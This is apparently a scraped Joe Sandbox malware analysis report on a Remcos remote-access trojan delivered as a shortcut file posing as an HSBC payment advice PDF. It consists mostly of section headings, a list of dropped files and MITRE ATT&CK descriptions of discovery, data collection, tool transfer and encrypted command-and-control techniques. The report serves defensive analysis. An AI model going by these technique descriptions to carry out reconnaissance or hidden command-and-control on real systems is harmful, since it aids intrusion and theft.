Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment Advice__HSBC Banking.pdf.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Stealing of Sensitive Information

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HODoCxSdp.exe.log

Windows Analysis Report
Payment Advice__HSBC Banking.pdf.lnk

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre